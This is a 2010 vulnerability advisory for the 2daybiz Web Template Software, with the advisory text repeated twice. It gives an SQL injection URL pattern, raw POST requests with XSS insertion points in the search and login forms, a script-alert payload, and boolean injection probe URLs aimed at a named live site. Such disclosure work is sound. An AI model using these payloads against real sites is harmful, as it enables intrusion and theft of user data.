2daybiz - The Web Template Software SQL injection and XSS vulnerability

2010-06-24 / 2010-06-25

Credit: Sangteamtham

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz - The Web Template Software SQL injection and XSS vulnerability
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/webtemplatesoftware.html
$ Date :06/24/2010
$ Email :sangteamtham@gmail.com
$
$**************
1.SQL injection
http://server/customize.php?tid=[id]+[SQL]
2.XSS
2.a : search products module
Here is my header:
http://www.2daytemplates.com/category.php
POST /category.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/category.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
category=0&product=0&keyword=[XSS here]&itemno=ssss&templates_per_page=9&search=Search
2.b: Login module
http://www.2daytemplates.com/memberlogin.php
POST /memberlogin.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/memberlogin.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
email=sangteamtham_hce%40ymail.com&password=[XSS Here]opage=&Submit=Login
XSS here such as:
">"><script>alert(String.fromCharCode(88, 83, 83));</script>
$**************
$Demo:
$ http://www.2daytemplates.com/customize.php?tid=1314+and+1=1--
$ http://www.2daytemplates.com/customize.php?tid=1314+and+1=0--
$
$
$
$**************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------
The Web Template Software.txt
$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz - The Web Template Software SQL and XSS vulnerability
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/webtemplatesoftware.html
$ Date :06/24/2010
$ Email :sangteamtham@gmail.com
$
$**************
1.SQL injection
http://server/customize.php?tid=[id]+[SQL]
2.XSS
2.a : search products module
Here is my header:
http://www.2daytemplates.com/category.php
POST /category.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/category.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 168
category=0&product=0&keyword=[XSS here]&itemno=ssss&templates_per_page=9&search=Search
2.b: Login module
http://www.2daytemplates.com/memberlogin.php
POST /memberlogin.php HTTP/1.1
Host: www.2daytemplates.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.2daytemplates.com/memberlogin.php
Cookie: PHPSESSID=j2bddq540saph1ve83gqii4276
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
email=sangteamtham_hce%40ymail.com&password=[XSS Here]opage=&Submit=Login
XSS here such as:
">"><script>alert(String.fromCharCode(88, 83, 83));</script>
$**************
$Demo:
$ http://www.2daytemplates.com/customize.php?tid=1314+and+1=1--
$ http://www.2daytemplates.com/customize.php?tid=1314+and+1=0--
$
$
$
$**************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

2daybiz - The Web Template Software SQL injection and XSS vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.